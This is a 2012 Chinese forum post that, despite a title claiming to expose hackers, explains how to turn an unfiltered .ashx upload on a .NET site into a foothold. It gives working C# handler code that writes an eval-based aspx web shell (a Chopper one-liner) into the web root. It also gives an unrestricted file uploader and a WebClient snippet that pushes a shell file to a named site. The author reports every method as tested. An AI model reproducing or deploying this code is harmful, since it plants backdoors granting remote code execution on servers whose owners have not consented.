揭穿黑客关于Ashx脚本写aspx木马的方法汇总

楼主^#

更多发布于：2012-12-17 14:54

[] 1


	某站，.Net环境,上传处未限制Ashx和Asmx，后者上传无法运行，提示Asmx脚本只能在本地运行，于是打算先传个Ashx脚本然后在当前目录下生成Aspx文件(目标不能执行Asp文件)，网上找到如下Ashx代码: <%@ webHandler Language="C#" Class="Handler" %> using System; using System.Web; using System.IO; public class Handler : IHttpHandler { public void ProcessRequest (HttpContext context) { context.Response.ContentType = "text/plain"; StreamWriter file1= File.CreateText(context.Server.MapPath("root.aspx")); file1.Write("<%@ PageLanguage=\"Jscript\"%><%eval(Request.Item[\"pass\"],\"unsafe\");%>"); file1.Flush(); file1.Close(); } public bool IsReusable { get { return false; } } } 我将脚本中的Asp一句话改成菜刀的Aspx一句话~不过执行的时候爆错，说未知指令@Page。遂采用一下2种方式解决： 1，用String连接字符串 <%@ WebHandler Language="C#" Class="Handler" %> using System; using System.Web; using System.IO; public class Handler : IHttpHandler { public void ProcessRequest (HttpContext context) { context.Response.ContentType = "text/plain"; string show="<% @PageLanguage=\"Jscript\"%"+"><%eval(Request.Item"+"[\"chopper\"]"+",\"unsafe\");%>"; StreamWriter file1=File.CreateText(context.Server.MapPath("root.aspx")); file1.Write(show); file1.Flush(); file1.Close(); } public bool IsReusable { get { return false; } } } 2.比较笨的方法，看代码吧 <%@ WebHandler Language="C#" Class="Uploader" %> using System; using System.IO; using System.Web; public class Uploader : IHttpHandler { public void ProcessRequest(HttpContext hc) { foreach (string fileKey in hc.Request.Files) { HttpPostedFile file = hc.Request.Files[fileKey]; file.SaveAs(Path.Combine(hc.Server.MapPath("."),file.FileName)); } } public bool IsReusable { get { return true; } } } 然后用VS建立WinForm程序~主函数里写： System.Net.WebClient myWebClient = new System.Net.WebClient(); myWebClient.UploadFile("http://www.xcnzz.com/Uploader.ashx", "POST","C:\\ma.aspx"); 执行就可以了~以上方法均测试成功~ P.S:Thx from T00ls.